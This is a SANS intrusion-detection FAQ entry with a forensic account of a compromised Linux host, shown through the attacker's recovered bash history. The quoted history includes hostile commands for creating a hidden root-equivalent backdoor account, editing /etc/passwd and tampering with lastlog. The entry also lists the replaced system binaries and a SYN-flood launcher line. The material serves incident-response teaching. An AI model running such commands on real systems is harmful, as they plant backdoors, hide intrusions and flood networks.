2 Days Left to Save $400 on SANS Cyber Defense Initiative 2014, Wash DC

Intrusion Detection FAQ: Is it really important to make sure the root account has a history file?

Yes! Many times this is one of the most important sources of information about a compromise or potential compromise. Consider the following forensic work submitted by David Rust.

On November 12-13th, a machine running SuSE 5.1 Linux 2.0.33 under our control was compromised, inundating our local network with traffic.

Once the machine was restored to our control, we discovered the system log files were erased, but several files were left behind, one of which was a .bash_history in the root directory.

BASH_HISTORY (verbatim)


/usr/sbin/useradd -d /home/skrilla -m -s /bin/bash skrilla
/usr/sbin/useradd -u 0 -o -g 0 -G 0 -d /home/skrilla -s /bin/bash rewt
passwd skrilla
passwd rewt
cat /etc/hosts.deny
cat /etc/hosts.allow
ftp 158.252.134.246
su skrilla
pico /etc/passwd
cd /var/log
ls
grep "sdn" *
id
clear
ls
pico lastlog
who
su rewt

The `grep "sdn" *` command appears to search for evidence of the attacker's address. Fortunately, he left it behind with the ftp command.

In addition to that, several programs were replaced with altered versions:

ifconfig
ps
in.rshd
psdevtab
chfn
inetd
netstat
chsh
killall
passwd
syslogd
du
login
tcpd
find
ls
top


Of course, passwd and shadow were attacked, effectively locking administrators out of the machine.

In addition to the above modified binaries, we found two additional files:
synk and synk4. synk contained 36 lines: ./synk4 0 $1 0 65535 >/dev/null &